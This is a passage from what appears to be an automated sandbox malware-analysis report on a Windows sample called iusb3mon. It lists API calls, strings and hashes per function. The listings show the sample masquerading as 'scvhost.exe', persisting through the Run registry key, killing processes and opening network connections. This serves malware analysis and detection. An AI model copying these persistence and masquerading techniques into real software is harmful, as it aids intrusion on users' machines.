                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,06248D56), ref: 06250A00
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,0625EAEC,00000000,00000000,00000000,06248D56), ref: 06250AD6
                                                                                                                    • WriteFile.KERNEL32(00000000), ref: 06250ADD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                    • API String ID: 3784150691-4022980321
                                                                                                                    • Opcode ID: 5f00f32d08bf1cefa37bebd5dfc4dc5a10a736d5dcfb0a1e4c671916ca649d48
                                                                                                                    • Instruction ID: 1960b58a8cfbfe42220fb5a73a106d663e1d4929a4499caaf4a4a2068b4b4cc7
                                                                                                                    • Opcode Fuzzy Hash: 5f00f32d08bf1cefa37bebd5dfc4dc5a10a736d5dcfb0a1e4c671916ca649d48
                                                                                                                    • Instruction Fuzzy Hash: 2531F572A603096FEFB4EA60DC49FAE736DEF45340F160056FE96D6044E670DA80CE52
                                                                                                                    Function 06244574 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63registryfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000000,?,?), ref: 062445A6
                                                                                                                    • CopyFileA.KERNEL32(00000000,?,00000000), ref: 062445D3
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?), ref: 062445ED
                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000104,?,?), ref: 06244608
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 06244611
                                                                                                                    Strings
                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 062445E3
                                                                                                                    • C:\Program Files\Common Files\scvhost.exe, xrefs: 062445AE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCopyModuleNameOpenValue
                                                                                                                    • String ID: C:\Program Files\Common Files\scvhost.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                                                                                    • API String ID: 3295893203-1226825942
                                                                                                                    • Opcode ID: 437ddc7e3be3a5b120398c2a8e24c96383f19e83ca0a80c4d437526644d22a0f
                                                                                                                    • Instruction ID: 9ae901db50c93c21f47cff7f1ade08fe01fc17140aba6ed444babc2754286a4b
                                                                                                                    • Opcode Fuzzy Hash: 437ddc7e3be3a5b120398c2a8e24c96383f19e83ca0a80c4d437526644d22a0f
                                                                                                                    • Instruction Fuzzy Hash: E0115E72A0031CBBEF219AA1ED49FDB7B6DEB04350F0000A2F709E6080DAB15E48CB60
                                                                                                                    Function 0624884F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 47libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06248854
                                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06248873
                                                                                                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 06248881
                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 062488B2
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 062488BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressCriticalDeleteFreeH_prologLoadProcSection
                                                                                                                    • String ID: closesocket$ws2_32.dll
                                                                                                                    • API String ID: 3065476401-181964208
                                                                                                                    • Opcode ID: aba1995c0c994562abd121335131d23c172fa795398c11fc665b1d3679261530
                                                                                                                    • Instruction ID: 7a31a5b1be46cd9a9e00b43a9e0d2643b9fb1d8668e8c5da5d401e6a79fedf6d
                                                                                                                    • Opcode Fuzzy Hash: aba1995c0c994562abd121335131d23c172fa795398c11fc665b1d3679261530
                                                                                                                    • Instruction Fuzzy Hash: 3D019675E20306DFD764AFA8D84C66EB7B9FF04321F114A29ED62E2180D774DA44CB51
                                                                                                                    Function 06243D76 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 36fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,0626CC34), ref: 06243D93
                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 06243DA1
                                                                                                                    • GetTickCount.KERNEL32 ref: 06243DA7
                                                                                                                    • wsprintfA.USER32 ref: 06243DC1
                                                                                                                    • MoveFileA.KERNEL32(?,?), ref: 06243DD8
                                                                                                                    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 06243DE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
                                                                                                                    • String ID: %s\%d.bak
                                                                                                                    • API String ID: 830686190-2116986511
                                                                                                                    • Opcode ID: 110cc4935ae38767ecf841f97b6d4b614861ade578979b782863b3a595befe39
                                                                                                                    • Instruction ID: e261eebb1849589546fa17b1fdab31acb5ac5f2a21fe9d828fe63996165cff18
                                                                                                                    • Opcode Fuzzy Hash: 110cc4935ae38767ecf841f97b6d4b614861ade578979b782863b3a595befe39
                                                                                                                    • Instruction Fuzzy Hash: 3DF0F4B6800328EBCB10DBA4ED8DFCB777DEB14311F000191B759D2054DA749684DFA1
                                                                                                                    Function 06250828 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0624B640), ref: 06250843
                                                                                                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,0624B640), ref: 06250857
                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0624B640), ref: 06250883
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0624B640), ref: 062508BB
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,0624B640), ref: 062508DD
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0624B640), ref: 062508F6
                                                                                                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0624B640), ref: 06250909
                                                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 06250947
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1823725401-0
                                                                                                                    • Opcode ID: 1ec41ff3531167576a12be2d9a4cecf71b2f5673bee0ed1c1dabdd9a4e6b26ee
                                                                                                                    • Instruction ID: 0040c7eac246d0ab96099f601859dbd4bf0e5d2739c2c63d4c5ff62e8bb1dac6
                                                                                                                    • Opcode Fuzzy Hash: 1ec41ff3531167576a12be2d9a4cecf71b2f5673bee0ed1c1dabdd9a4e6b26ee
                                                                                                                    • Instruction Fuzzy Hash: A831F4729343175FEBB03F756C8C93F769DEA497947074529FE92C3104EA719C408AA2
                                                                                                                    Function 06243441 Relevance: 12.1, APIs: 8, Instructions: 94processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06243446
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 06243475
                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 06243497
                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 062434EF
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?,?,00000000,00000128,00000000,?,00000002,00000000), ref: 062434FF
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 06243509
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 06243510
                                                                                                                      • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$NextProcess$CloseCreateDecrementFirstH_prologHandleInterlockedOpenSnapshotTerminateToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87439402-0
                                                                                                                    • Opcode ID: d17f99585bef53ea96c58c12dbc1465bfddf35ad76b38be92f363edd9f5881cf
                                                                                                                    • Instruction ID: 29ec2ec1702e3f26f58a3af364094d4ba6b43a000911dcf1f743fbb53bf904c4
                                                                                                                    • Opcode Fuzzy Hash: d17f99585bef53ea96c58c12dbc1465bfddf35ad76b38be92f363edd9f5881cf
                                                                                                                    • Instruction Fuzzy Hash: 6831727182022AAEDBE5FBA0DC909FE7B78FF05350F114159ED26E6090DF788B45CA61
                                                                                                                    Function 0625B68A Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GlobalLock.KERNEL32(?), ref: 0625B6AA
                                                                                                                    • lstrcmpA.KERNEL32(?,?), ref: 0625B6B6
                                                                                                                    • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0625B6C8
                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0625B6EB
                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0625B6F3
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0625B700
                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0625B70D
                                                                                                                    • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0625B72B
                                                                                                                      • Part of subcall function 0625B94C: GlobalFlags.KERNEL32(?), ref: 0625B956
                                                                                                                      • Part of subcall function 0625B94C: GlobalUnlock.KERNEL32(?), ref: 0625B96D
                                                                                                                      • Part of subcall function 0625B94C: GlobalFree.KERNEL32(?), ref: 0625B978
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 168474834-0
                                                                                                                    • Opcode ID: 084c55ca784d882936019f20e21ee35040134187f26fb08dc86945ab97664b5e
                                                                                                                    • Instruction ID: 4db4af1f3602dce36935f101df5998e68bf3b735abfe03bd450f1083dc0685ef
                                                                                                                    • Opcode Fuzzy Hash: 084c55ca784d882936019f20e21ee35040134187f26fb08dc86945ab97664b5e
                                                                                                                    • Instruction Fuzzy Hash: 3C119E72920204BAEBB16BB5CC49EBFBABEEF85701F124419FE08C5021D631D940DB60
                                                                                                                    Function 06251FA5 Relevance: 10.7, APIs: 7, Instructions: 186processsynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessA.KERNEL32(0624E9E9,0624E9E9,00000000,00000000,00000001,000000FF,0625E590,00000000,?,?,00000000,00000000,0626EE8C), ref: 0625210C
                                                                                                                    • GetLastError.KERNEL32 ref: 06252114
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 06252151
                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0625215E
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 06252167
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 06252174
                                                                                                                    • CloseHandle.KERNEL32(0624EA45), ref: 06252184
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$Process$CodeCreateErrorExitLastObjectSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 966596688-0
                                                                                                                    • Opcode ID: 51a03115625cb7e9fd64120cd145f3fdd020c4fbb3cfd1e4013b75316ee4d8a5
                                                                                                                    • Instruction ID: d0ce2d6db5ce1686b3942b214a97c005f2ce82f4d707495f17472fcd4261305d
                                                                                                                    • Opcode Fuzzy Hash: 51a03115625cb7e9fd64120cd145f3fdd020c4fbb3cfd1e4013b75316ee4d8a5
                                                                                                                    • Instruction Fuzzy Hash: A0613771D2130ADFDB719FA8CC88AAEBBB5EF45310F168056ED21AB191C7719601CB50
                                                                                                                    Function 001D1B50 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 001D1BD3
                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001D1C1F
                                                                                                                    • __Getctype.LIBCPMT ref: 001D1C38
                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 001D1C54
                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 001D1CE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                    • String ID: bad locale name
                                                                                                                    • API String ID: 1840309910-1405518554
                                                                                                                    • Opcode ID: d2103a5ed9bb33274841ad58a8826034fdf11974f3d775959b60a8bce6711cd9
                                                                                                                    • Instruction ID: c0f167747f829bb9ecf238143345303c2fc2cef3d0f2384ccdd04c53a1ee1b42
                                                                                                                    • Opcode Fuzzy Hash: d2103a5ed9bb33274841ad58a8826034fdf11974f3d775959b60a8bce6711cd9
                                                                                                                    • Instruction Fuzzy Hash: 8C5152B1D00348ABDF10DFE4D945B9EBBB8AF24714F18412AEC14AB341E775E909CB92
                                                                                                                    Function 062441BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 98filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,?,?), ref: 0624420B
                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 0624422E
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 06244240
                                                                                                                    • wsprintfA.USER32 ref: 06244271
                                                                                                                    • lstrcpyA.KERNEL32(?,?,?,?), ref: 0624428A
                                                                                                                      • Part of subcall function 06243FC8: wsprintfA.USER32 ref: 062440AA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewsprintf$CloseCreateHandleWritelstrcpy
                                                                                                                    • String ID: %s %s
                                                                                                                    • API String ID: 3555437440-2939940506
                                                                                                                    • Opcode ID: 99151558458be4deab84ede2bfb914dcfba373c8107de2c3af5461267d57fd48
                                                                                                                    • Instruction ID: 5a152132b103a35759240efae1ab5833b676d423f75209e39cf01de3274ae3a5
                                                                                                                    • Opcode Fuzzy Hash: 99151558458be4deab84ede2bfb914dcfba373c8107de2c3af5461267d57fd48
                                                                                                                    • Instruction Fuzzy Hash: 3E315A729102196AEB64FA74EC89FDB77BCEB04314F400552FA09E6480EA719A84CB60
                                                                                                                    Function 06241434 Relevance: 10.6, APIs: 7, Instructions: 87networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0624180D: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06241832
                                                                                                                      • Part of subcall function 0624180D: CancelIo.KERNEL32(?,?,?,?,0624560D), ref: 0624183B
                                                                                                                      • Part of subcall function 0624180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06241847
                                                                                                                      • Part of subcall function 0624180D: closesocket.WS2_32(?), ref: 06241850
                                                                                                                      • Part of subcall function 0624180D: SetEvent.KERNEL32(?,?,?,?,0624560D), ref: 06241859
                                                                                                                    • ResetEvent.KERNEL32(?,00000000,?,00000000,?,?,06245555,?,00000000), ref: 06241451
                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 06241460
                                                                                                                    • gethostbyname.WS2_32(?), ref: 06241471
                                                                                                                    • htons.WS2_32(?), ref: 06241486
                                                                                                                    • connect.WS2_32(?,00000002,00000010), ref: 062414A3
                                                                                                                    • setsockopt.WS2_32(?,0000FFFF,00000008,00000000,00000004), ref: 062414C8
                                                                                                                    • WSAIoctl.WS2_32(?,98000004,00000000,0000000C,00000000,00000000,?,00000000,00000000), ref: 062414F9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
